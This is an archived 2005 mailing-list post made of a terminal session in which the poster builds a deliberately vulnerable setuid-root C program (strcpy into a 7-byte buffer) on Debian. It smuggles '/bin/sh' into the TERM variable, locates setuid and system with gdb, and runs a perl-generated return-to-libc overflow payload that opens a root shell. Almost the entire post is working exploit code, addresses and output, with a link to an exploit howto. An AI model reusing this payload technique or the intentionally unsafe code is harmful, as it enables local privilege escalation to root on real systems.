An HTML attachment was scrubbed... URL: /pipermail/mailinglist_ilug-cochin.org/attachments/20050418/1ed17964/attachment.htm From [EMAIL PROTECTED] Tue Apr 19 10:00:15 2005 From: [EMAIL PROTECTED] (Hashir N A) Date: Tue Apr 19 09:25:31 2005 Subject: [Mailinglist] debian test test Message-ID: <[EMAIL PROTECTED]>
http://harry.ulyssis.org/hackerinfo/howto_exploit_FC2.txt ------------------ test in Debian --------------------------------------------------------- [EMAIL PROTECTED]:~/bof$ cat > ch.c #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> int main() { char file_name[20]; printf("Put the file name you want to chown and chmod: "); scanf("%s",file_name); chown(file_name,0,0); chmod(file_name,04755); exit(0); } [EMAIL PROTECTED]:~/bof$ su Password: Sarge8:/home/vangelis/bof# gcc -o ch ch.c Sarge8:/home/vangelis/bof# cat > vul.c int main(int argc, char *argv[]) { char buff[7]; strcpy(buff, argv[1]); return 0; } Sarge8:/home/vangelis/bof# gcc -o vul vul.c Sarge8:/home/vangelis/bof# ./ch Put the file name you want to chown and chmod: vul Sarge8:/home/vangelis/bof# ls -l vul -rwsr-xr-x 1 root root 11921 2004-11-05 09:04 vul Sarge8:/home/vangelis/bof# su vangelis [EMAIL PROTECTED]:~/bof$ env TERM=vt100 SHELL=/bin/bash SSH_CLIENT=::ffff:2xx.1xx.xx.xxx 3418 22 SSH_TTY=/dev/pts/6 USER=vangelis : [EMAIL PROTECTED]:~/bof$ export TERM="vt100;/bin/sh" [EMAIL PROTECTED]:~/bof$ env TERM=vt100;/bin/sh SHELL=/bin/bash SSH_CLIENT=::ffff:2xx.1xx.xx.xxx 3418 22 SSH_TTY=/dev/pts/6 USER=vangelis : [EMAIL PROTECTED]:~/bof$ gdb vul GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) b main Breakpoint 1 at 0x804836a (gdb) r Starting program: /home/vangelis/bof/vul Breakpoint 1, 0x0804836a in main () (gdb) x/50x $ebp 0xbffffa88: 0xbffffb14 0x4003b7f8 0x00000001 0xbffffb14 0xbffffa98: 0xbffffb1c 0x00000000 0x4015dedc 0x400164a0 0xbffffaa8: 0xbffffaa0 0x080483a0 0xbffffa90 0x4003b7b4 0xbffffab8: 0x00000000 0x00000000 0x00000000 0x40016c40 0xbffffac8: 0x00000001 0x080482a0 0x00000000 0x4000bbe0 0xbffffad8: 0x4000c290 0x40016c40 0x00000001 0x080482a0 0xbffffae8: 0x00000000 0x080482c1 0x08048364 0x00000001 0xbffffaf8: 0xbffffb14 0x080483a0 0x08048400 0x4000c290 0xbffffb08: 0xbffffb0c 0x00000000 0x00000001 0xbffffc01 0xbffffb18: 0x00000000 0xbffffc18 0xbffffc28 0xbffffc3b 0xbffffb28: 0xbffffc64 0xbffffc77 0xbffffc85 0xbffffeba 0xbffffb38: 0xbffffec6 0xbfffff00 0xbfffff18 0xbfffff24 0xbffffb48: 0xbfffff3b 0xbfffff4d (gdb) x/s 0xbffffc01 0xbffffc01: "/home/vangelis/bof/vul" (gdb) x/8wx 0xbffffb1c 0xbffffb1c: 0xbffffc18 0xbffffc28 0xbffffc3b 0xbffffc64 0xbffffb2c: 0xbffffc77 0xbffffc85 0xbffffeba 0xbffffec6 (gdb) x/s 0xbffffc18 0xbffffc18: "SHELL=/bin/bash" (gdb) disas main Dump of assembler code for function main: 0x08048364 <main+0>: push %ebp 0x08048365 <main+1>: mov %esp,%ebp 0x08048367 <main+3>: sub $0x28,%esp 0x0804836a <main+6>: and $0xfffffff0,%esp 0x0804836d <main+9>: mov $0x0,%eax 0x08048372 <main+14>: sub %eax,%esp 0x08048374 <main+16>: mov 0xc(%ebp),%eax 0x08048377 <main+19>: add $0x4,%eax 0x0804837a <main+22>: mov (%eax),%eax 0x0804837c <main+24>: mov %eax,0x4(%esp) 0x08048380 <main+28>: lea 0xffffffe8(%ebp),%eax 0x08048383 <main+31>: mov %eax,(%esp) 0x08048386 <main+34>: call 0x8048288 <_init+56> 0x0804838b <main+39>: mov $0x0,%eax 0x08048390 <main+44>: leave 0x08048391 <main+45>: ret 0x08048392 <main+46>: nop 0x08048393 <main+47>: nop 0x08048394 <main+48>: nop 0x08048395 <main+49>: nop 0x08048396 <main+50>: nop 0x08048397 <main+51>: nop 0x08048398 <main+52>: nop 0x08048399 <main+53>: nop 0x0804839a <main+54>: nop 0x0804839b <main+55>: nop 0x0804839c <main+56>: nop 0x0804839d <main+57>: nop 0x0804839e <main+58>: nop 0x0804839f <main+59>: nop End of assembler dump. (gdb) x/i setuid 0x400d4160 <setuid>: push %ebx (gdb) x/i system 0x400668b0 <system>: sub $0x10,%esp (gdb) q The program is running. Exit anyway? (y or n) y [EMAIL PROTECTED]:~/bof$ ## exploit payload ## +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ | data to overflow | (ret of printf) x n(dis from **env to *env[0]) | *setuid | *system | +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 0xbffffa98: 0xbffffb1c 0x00000000 0x4015dedc 0x400164a0 ---------- *-- (**env) | 0xbffffaa8: | 0xbffffaa0 0x080483a0 0xbffffa90 0x4003b7b4 0xbffffab8: | 0x00000000 0x00000000 0x00000000 0x40016c40 0xbffffac8: | 0x00000001 0x080482a0 0x00000000 0x4000bbe0 0xbffffad8: | 0x4000c290 0x40016c40 0x00000001 0x080482a0 0xbffffae8: | 0x00000000 0x080482c1 0x08048364 0x00000001 0xbffffaf8: | 0xbffffb14 0x080483a0 0x08048400 0x4000c290 0xbffffb08: | 0xbffffb0c 0x00000000 0x00000001 0xbffffc01 0xbffffb18: | 0x00000000 0xbffffc18 0xbffffc28 0xbffffc3b | ---------- *-----------------> (*env[0]) (total 34) [EMAIL PROTECTED]:~/bof$ ./vul `perl -e 'print "A"x28,"\xc9\x5a\x07\x40"x34,"\x60\x41\x0d\x40", "\xb0\x68\x06\x40"'` sh-3.00# id uid=0(root) gid=1003(vangelis) groups=1003(vangelis) sh-3.00# lv Hashir N A
